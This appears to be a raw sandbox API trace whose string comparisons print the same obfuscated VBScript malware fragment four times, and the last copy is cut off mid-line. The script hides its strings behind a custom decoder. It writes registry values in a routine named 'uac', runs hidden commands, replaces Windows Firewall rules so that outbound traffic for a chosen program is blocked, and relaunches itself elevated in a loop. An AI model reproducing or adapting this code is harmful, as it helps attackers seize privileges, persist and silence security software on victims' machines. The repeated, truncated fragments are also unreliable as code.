bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.309] wcsncmp (_String1="c(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.309] wcsncmp (_String1="(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.309] wcsncmp (_String1="Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.309] wcsncmp (_String1="id(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 